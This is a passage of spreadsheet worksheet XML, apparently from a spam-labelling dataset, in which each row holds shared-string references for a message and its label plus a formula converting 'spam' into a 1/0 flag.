    </row>
    <row r="1035" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1035" t="s">
        <v>6305</v>
      </c>
      <c r="B1035" t="s">
        <v>5294</v>
      </c>
      <c r="C1035" s="1">
        <f>IF(B1035="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1036" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1036" t="s">
        <v>6306</v>
      </c>
      <c r="B1036" t="s">
        <v>5294</v>
      </c>
      <c r="C1036" s="1">
        <f>IF(B1036="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1037" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1037" t="s">
        <v>6307</v>
      </c>
      <c r="B1037" t="s">
        <v>5294</v>
      </c>
      <c r="C1037" s="1">
        <f>IF(B1037="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1038" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1038" t="s">
        <v>6308</v>
      </c>
      <c r="B1038" t="s">
        <v>5294</v>
      </c>
      <c r="C1038" s="1">
        <f>IF(B1038="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1039" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1039" t="s">
        <v>6309</v>
      </c>
      <c r="B1039" t="s">
        <v>5294</v>
      </c>
      <c r="C1039" s="1">
        <f>IF(B1039="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1040" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1040" t="s">
        <v>6310</v>
      </c>
      <c r="B1040" t="s">
        <v>5294</v>
      </c>
      <c r="C1040" s="1">
        <f>IF(B1040="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1041" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1041" t="s">
        <v>6311</v>
      </c>
      <c r="B1041" t="s">
        <v>5294</v>
      </c>
      <c r="C1041" s="1">
        <f>IF(B1041="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1042" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1042" t="s">
        <v>6312</v>
      </c>
      <c r="B1042" t="s">
        <v>5294</v>
      </c>
      <c r="C1042" s="1">
        <f>IF(B1042="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1043" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1043" t="s">
        <v>6313</v>
      </c>
      <c r="B1043" t="s">
        <v>5294</v>
      </c>
      <c r="C1043" s="1">
        <f>IF(B1043="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1044" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1044" t="s">
        <v>5510</v>
      </c>
      <c r="B1044" t="s">
        <v>5294</v>
      </c>
      <c r="C1044" s="1">
        <f>IF(B1044="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1045" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1045" t="s">
        <v>6314</v>
      </c>
      <c r="B1045" t="s">
        <v>5294</v>
      </c>
      <c r="C1045" s="1">
        <f>IF(B1045="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1046" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1046" t="s">
        <v>6315</v>
      </c>
      <c r="B1046" t="s">
        <v>5297</v>
      </c>
      <c r="C1046" s="1">
        <f>IF(B1046="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1047" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1047" t="s">
        <v>6316</v>
      </c>
      <c r="B1047" t="s">
        <v>5294</v>
      </c>
      <c r="C1047" s="1">
        <f>IF(B1047="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1048" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1048" t="s">
        <v>6317</v>
      </c>
      <c r="B1048" t="s">
        <v>5294</v>
      </c>
      <c r="C1048" s="1">
        <f>IF(B1048="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1049" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1049" t="s">
        <v>6318</v>
      </c>
      <c r="B1049" t="s">
        <v>5297</v>
      </c>
      <c r="C1049" s="1">
        <f>IF(B1049="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1050" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1050" t="s">
        <v>6319</v>
      </c>
      <c r="B1050" t="s">
        <v>5294</v>
      </c>
      <c r="C1050" s="1">
        <f>IF(B1050="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1051" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1051" t="s">
        <v>6320</v>
      </c>
      <c r="B1051" t="s">
        <v>5297</v>
      </c>
      <c r="C1051" s="1">
        <f>IF(B1051="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1052" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1052" t="s">
        <v>6321</v>
      </c>
      <c r="B1052" t="s">
        <v>5294</v>
      </c>
      <c r="C1052" s="1">
        <f>IF(B1052="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1053" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1053" t="s">
        <v>6322</v>
      </c>
      <c r="B1053" t="s">
        <v>5294</v>
      </c>
      <c r="C1053" s="1">
        <f>IF(B1053="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1054" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1054" t="s">
        <v>6323</v>
      </c>
      <c r="B1054" t="s">
        <v>5294</v>
      </c>
      <c r="C1054" s="1">
        <f>IF(B1054="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1055" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1055" t="s">
        <v>6324</v>
      </c>
      <c r="B1055" t="s">
        <v>5294</v>
      </c>
      <c r="C1055" s="1">
        <f>IF(B1055="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1056" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1056" t="s">
        <v>6325</v>
      </c>
      <c r="B1056" t="s">
        <v>5294</v>
      </c>
      <c r="C1056" s="1">
        <f>IF(B1056="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1057" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1057" t="s">
        <v>6326</v>
      </c>
      <c r="B1057" t="s">
        <v>5294</v>
      </c>
      <c r="C1057" s="1">
        <f>IF(B1057="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1058" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1058" t="s">
        <v>6327</v>
      </c>
      <c r="B1058" t="s">
        <v>5294</v>
      </c>
      <c r="C1058" s="1">
        <f>IF(B1058="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1059" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1059" t="s">
        <v>6328</v>
      </c>
      <c r="B1059" t="s">
        <v>5294</v>
      </c>
      <c r="C1059" s="1">
        <f>IF(B1059="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1060" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1060" t="s">
        <v>6329</v>
      </c>
      <c r="B1060" t="s">
        <v>5294</v>
      </c>
      <c r="C1060" s="1">
        <f>IF(B1060="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1061" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1061" t="s">
        <v>6330</v>
      </c>
      <c r="B1061" t="s">
        <v>5297</v>
      </c>
      <c r="C1061" s="1">
        <f>IF(B1061="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1062" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1062" t="s">
        <v>6331</v>
      </c>
      <c r="B1062" t="s">
        <v>5294</v>
      </c>
      <c r="C1062" s="1">
        <f>IF(B1062="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1063" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1063" t="s">
        <v>6332</v>
      </c>
      <c r="B1063" t="s">
        <v>5294</v>
      </c>
      <c r="C1063" s="1">
        <f>IF(B1063="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1064" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1064" t="s">
        <v>6333</v>
      </c>
      <c r="B1064" t="s">
        <v>5294</v>
      </c>
      <c r="C1064" s="1">
        <f>IF(B1064="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1065" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1065" t="s">
        <v>6334</v>
      </c>
      <c r="B1065" t="s">
        <v>5297</v>
      </c>
      <c r="C1065" s="1">
        <f>IF(B1065="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1066" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1066" t="s">
        <v>6335</v>
      </c>
      <c r="B1066" t="s">
        <v>5294</v>
      </c>
      <c r="C1066" s="1">
        <f>IF(B1066="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1067" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1067" t="s">
        <v>6336</v>
      </c>
      <c r="B1067" t="s">
        <v>5294</v>
      </c>
      <c r="C1067" s="1">
        <f>IF(B1067="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1068" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1068" t="s">
        <v>6337</v>
      </c>
      <c r="B1068" t="s">
        <v>5294</v>
      </c>
      <c r="C1068" s="1">
        <f>IF(B1068="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1069" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1069" t="s">
        <v>6338</v>
      </c>
      <c r="B1069" t="s">
        <v>5294</v>
      </c>
      <c r="C1069" s="1">
        <f>IF(B1069="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1070" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1070" t="s">
        <v>6339</v>
      </c>
      <c r="B1070" t="s">
        <v>5297</v>
      </c>
      <c r="C1070" s="1">
        <f>IF(B1070="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1071" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1071" t="s">
        <v>6340</v>
      </c>
      <c r="B1071" t="s">
        <v>5294</v>
      </c>
      <c r="C1071" s="1">
        <f>IF(B1071="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1072" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1072" t="s">
        <v>6341</v>
      </c>
      <c r="B1072" t="s">
        <v>5294</v>
      </c>
      <c r="C1072" s="1">
        <f>IF(B1072="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1073" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1073" t="s">
        <v>6342</v>
      </c>
      <c r="B1073" t="s">
        <v>5297</v>
      </c>
      <c r="C1073" s="1">
        <f>IF(B1073="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1074" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1074" t="s">
        <v>6343</v>
      </c>
      <c r="B1074" t="s">
        <v>5297</v>
      </c>
      <c r="C1074" s="1">
        <f>IF(B1074="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1075" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1075" t="s">
        <v>6344</v>
      </c>
      <c r="B1075" t="s">
        <v>5294</v>
      </c>
      <c r="C1075" s="1">
        <f>IF(B1075="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1076" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1076" t="s">
        <v>6345</v>
      </c>
      <c r="B1076" t="s">
        <v>5294</v>
      </c>
      <c r="C1076" s="1">
        <f>IF(B1076="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1077" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1077" t="s">
        <v>6346</v>
      </c>
      <c r="B1077" t="s">
        <v>5294</v>
      </c>
      <c r="C1077" s="1">
        <f>IF(B1077="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1078" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1078" t="s">
        <v>6347</v>
      </c>
      <c r="B1078" t="s">
        <v>5294</v>
      </c>
      <c r="C1078" s="1">
        <f>IF(B1078="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1079" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1079" t="s">
        <v>6348</v>
      </c>
      <c r="B1079" t="s">
        <v>5294</v>
      </c>
      <c r="C1079" s="1">
        <f>IF(B1079="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1080" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1080" t="s">
        <v>6349</v>
      </c>
      <c r="B1080" t="s">
        <v>5294</v>
      </c>
      <c r="C1080" s="1">
        <f>IF(B1080="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1081" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1081" t="s">
        <v>6350</v>
      </c>
      <c r="B1081" t="s">
        <v>5294</v>
      </c>
      <c r="C1081" s="1">
        <f>IF(B1081="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1082" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1082" t="s">
        <v>6351</v>
      </c>
      <c r="B1082" t="s">
        <v>5294</v>
      </c>
      <c r="C1082" s="1">
        <f>IF(B1082="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1083" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1083" t="s">
        <v>6352</v>
      </c>
      <c r="B1083" t="s">
        <v>5294</v>
      </c>
      <c r="C1083" s="1">
        <f>IF(B1083="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1084" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1084" t="s">
        <v>6353</v>
      </c>
      <c r="B1084" t="s">
        <v>5294</v>
      </c>
      <c r="C1084" s="1">
        <f>IF(B1084="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1085" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1085" t="s">
        <v>6354</v>
      </c>
      <c r="B1085" t="s">
        <v>5294</v>
      </c>
      <c r="C1085" s="1">
        <f>IF(B1085="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1086" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1086" t="s">
        <v>6355</v>
      </c>
      <c r="B1086" t="s">
        <v>5294</v>
      </c>
      <c r="C1086" s="1">
        <f>IF(B1086="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1087" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1087" t="s">
        <v>6356</v>
      </c>
      <c r="B1087" t="s">
        <v>5294</v>
      </c>
      <c r="C1087" s="1">
        <f>IF(B1087="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1088" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1088" t="s">
        <v>6357</v>
      </c>
      <c r="B1088" t="s">
        <v>5294</v>
      </c>
      <c r="C1088" s="1">
        <f>IF(B1088="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1089" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1089" t="s">
        <v>6358</v>
      </c>
      <c r="B1089" t="s">
        <v>5294</v>
      </c>
      <c r="C1089" s="1">
        <f>IF(B1089="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1090" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1090" t="s">
        <v>6359</v>
      </c>
      <c r="B1090" t="s">
        <v>5297</v>
      </c>
      <c r="C1090" s="1">
        <f>IF(B1090="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1091" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1091" t="s">
        <v>6360</v>
      </c>
      <c r="B1091" t="s">
        <v>5294</v>
      </c>
      <c r="C1091" s="1">
        <f>IF(B1091="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1092" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1092" t="s">
        <v>6361</v>
      </c>
      <c r="B1092" t="s">
        <v>5297</v>
      </c>
      <c r="C1092" s="1">
        <f>IF(B1092="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1093" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1093" t="s">
        <v>6362</v>
      </c>
      <c r="B1093" t="s">
        <v>5294</v>
      </c>
      <c r="C1093" s="1">
        <f>IF(B1093="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1094" t="s">
        <v>6363</v>
      </c>
      <c r="B1094" t="s">
        <v>5294</v>
      </c>
      <c r="C1094" s="1">
        <f>IF(B1094="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1095" t="s">
        <v>6364</v>
      </c>
      <c r="B1095" t="s">
        <v>5294</v>
      </c>
      <c r="C1095" s="1">
        <f>IF(B1095="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1096" t="s">
        <v>6365</v>
      </c>
      <c r="B1096" t="s">
        <v>5294</v>
      </c>
      <c r="C1096" s="1">
        <f>IF(B1096="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1097" t="s">
        <v>6366</v>
      </c>
      <c r="B1097" t="s">
        <v>5294</v>
      </c>
      <c r="C1097" s="1">
        <f>IF(B1097="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1098" t="s">
        <v>6367</v>
      </c>
      <c r="B1098" t="s">
        <v>5297</v>
      </c>
      <c r="C1098" s="1">
        <f>IF(B1098="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1099" t="s">
        <v>6368</v>
      </c>
      <c r="B1099" t="s">
        <v>5294</v>
      </c>
      <c r="C1099" s="1">
        <f>IF(B1099="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1100" t="s">
        <v>6369</v>
      </c>
      <c r="B1100" t="s">
        <v>5294</v>
      </c>
      <c r="C1100" s="1">
        <f>IF(B1100="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1101" t="s">
        <v>6370</v>
      </c>
      <c r="B1101" t="s">
        <v>5294</v>
      </c>
      <c r="C1101" s="1">
        <f>IF(B1101="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1102" t="s">
        <v>6371</v>
      </c>
      <c r="B1102" t="s">
        <v>5294</v>
      </c>
      <c r="C1102" s="1">
        <f>IF(B1102="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1103" t="s">
        <v>6372</v>
      </c>
      <c r="B1103" t="s">
        <v>5294</v>
      </c>
      <c r="C1103" s="1">
        <f>IF(B1103="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1104" t="s">
        <v>6373</v>
      </c>
      <c r="B1104" t="s">
        <v>5294</v>
      </c>
      <c r="C1104" s="1">
        <f>IF(B1104="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1105" t="s">
        <v>6374</v>
      </c>
      <c r="B1105" t="s">
        <v>5294</v>
      </c>
      <c r="C1105" s="1">
        <f>IF(B1105="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1106" t="s">
        <v>6375</v>
      </c>
      <c r="B1106" t="s">
        <v>5297</v>
      </c>
      <c r="C1106" s="1">
        <f>IF(B1106="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1107" t="s">
        <v>6376</v>
      </c>
      <c r="B1107" t="s">
        <v>5294</v>
      </c>
      <c r="C1107" s="1">
        <f>IF(B1107="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1108" t="s">
        <v>6377</v>
      </c>
      <c r="B1108" t="s">
        <v>5294</v>
      </c>
      <c r="C1108" s="1">
        <f>IF(B1108="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1109" t="s">
        <v>6378</v>
      </c>
      <c r="B1109" t="s">
        <v>5294</v>
      </c>
      <c r="C1109" s="1">
        <f>IF(B1109="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1110" t="s">
        <v>6379</v>
      </c>
      <c r="B1110" t="s">
        <v>5294</v>
      </c>
      <c r="C1110" s="1">
        <f>IF(B1110="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1111" t="s">
        <v>6380</v>
      </c>
      <c r="B1111" t="s">
        <v>5294</v>
      </c>
      <c r="C1111" s="1">
        <f>IF(B1111="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1112" t="s">
        <v>6381</v>
      </c>
      <c r="B1112" t="s">
        <v>5294</v>
      </c>
      <c r="C1112" s="1">
        <f>IF(B1112="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1113" t="s">
        <v>6382</v>
      </c>
      <c r="B1113" t="s">
        <v>5294</v>
      </c>
      <c r="C1113" s="1">
        <f>IF(B1113="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1114" t="s">
        <v>6383</v>
      </c>
      <c r="B1114" t="s">
        <v>5294</v>
      </c>
      <c r="C1114" s="1">
        <f>IF(B1114="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1115" t="s">
        <v>6384</v>
      </c>
      <c r="B1115" t="s">
        <v>5294</v>
      </c>
      <c r="C1115" s="1">
        <f>IF(B1115="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1116" t="s">
        <v>6385</v>
      </c>
      <c r="B1116" t="s">
        <v>5294</v>
      </c>
      <c r="C1116" s="1">
        <f>IF(B1116="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1117" t="s">
        <v>6386</v>
      </c>
      <c r="B1117" t="s">
        <v>5294</v>
      </c>
      <c r="C1117" s="1">
        <f>IF(B1117="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1118" t="s">
        <v>6387</v>
      </c>
      <c r="B1118" t="s">
        <v>5294</v>
      </c>
      <c r="C1118" s="1">
        <f>IF(B1118="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1119" t="s">
        <v>6388</v>
      </c>
      <c r="B1119" t="s">
        <v>5297</v>
      </c>
      <c r="C1119" s="1">
        <f>IF(B1119="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1120" t="s">
        <v>6389</v>
      </c>
      <c r="B1120" t="s">
        <v>5294</v>
      </c>
      <c r="C1120" s="1">
        <f>IF(B1120="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1121" t="s">
        <v>6390</v>
      </c>
      <c r="B1121" t="s">
        <v>5297</v>
      </c>
      <c r="C1121" s="1">
        <f>IF(B1121="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1122" t="s">
        <v>6391</v>
      </c>
      <c r="B1122" t="s">
        <v>5294</v>
      </c>
      <c r="C1122" s="1">
        <f>IF(B1122="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1123" t="s">
        <v>6392</v>
      </c>
      <c r="B1123" t="s">
        <v>5297</v>
      </c>
      <c r="C1123" s="1">
        <f>IF(B1123="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1124" t="s">
        <v>6393</v>
      </c>
      <c r="B1124" t="s">
        <v>5294</v>
      </c>
      <c r="C1124" s="1">
        <f>IF(B1124="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1125" t="s">
        <v>6394</v>
      </c>
      <c r="B1125" t="s">
        <v>5294</v>
      </c>
      <c r="C1125" s="1">
        <f>IF(B1125="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1126" t="s">
        <v>6395</v>
      </c>
      <c r="B1126" t="s">
        <v>5294</v>
      </c>
      <c r="C1126" s="1">
        <f>IF(B1126="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1127" t="s">
        <v>6396</v>
      </c>
      <c r="B1127" t="s">
        <v>5297</v>
      </c>
      <c r="C1127" s="1">
        <f>IF(B1127="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1128" t="s">
        <v>6397</v>
      </c>
      <c r="B1128" t="s">
        <v>5294</v>
      </c>
      <c r="C1128" s="1">
        <f>IF(B1128="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1129" t="s">
        <v>6398</v>
      </c>
      <c r="B1129" t="s">
        <v>5294</v>
      </c>
      <c r="C1129" s="1">
        <f>IF(B1129="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1130" t="s">
        <v>6399</v>
      </c>
      <c r="B1130" t="s">
        <v>5297</v>
      </c>
      <c r="C1130" s="1">
        <f>IF(B1130="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="1131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1131" t="s">
        <v>6400</v>
      </c>
      <c r="B1131" t="s">
        <v>5294</v>
      </c>
      <c r="C1131" s="1">
        <f>IF(B1131="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1132" t="s">
        <v>6401</v>
      </c>
      <c r="B1132" t="s">
        <v>5294</v>
      </c>
      <c r="C1132" s="1">
        <f>IF(B1132="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1133" t="s">
        <v>5376</v>
      </c>
      <c r="B1133" t="s">
        <v>5294</v>
      </c>
      <c r="C1133" s="1">
        <f>IF(B1133="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1134" t="s">
        <v>6394</v>
      </c>
      <c r="B1134" t="s">
        <v>5294</v>
      </c>
      <c r="C1134" s="1">
        <f>IF(B1134="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1135" t="s">
        <v>5410</v>
      </c>
      <c r="B1135" t="s">
        <v>5294</v>
      </c>
      <c r="C1135" s="1">
        <f>IF(B1135="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1136" t="s">
        <v>6402</v>
      </c>
      <c r="B1136" t="s">
        <v>5294</v>
      </c>
      <c r="C1136" s="1">
        <f>IF(B1136="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1137" t="s">
        <v>6403</v>
      </c>
      <c r="B1137" t="s">
        <v>5294</v>
      </c>
      <c r="C1137" s="1">
        <f>IF(B1137="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A1138" t="s">
        <v>6404</v>
      </c>
      <c r="B1138" t="s">
        <v>5297</v>
      </c>
      <c r="C1138" s="1">
        <f>IF(B1138="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
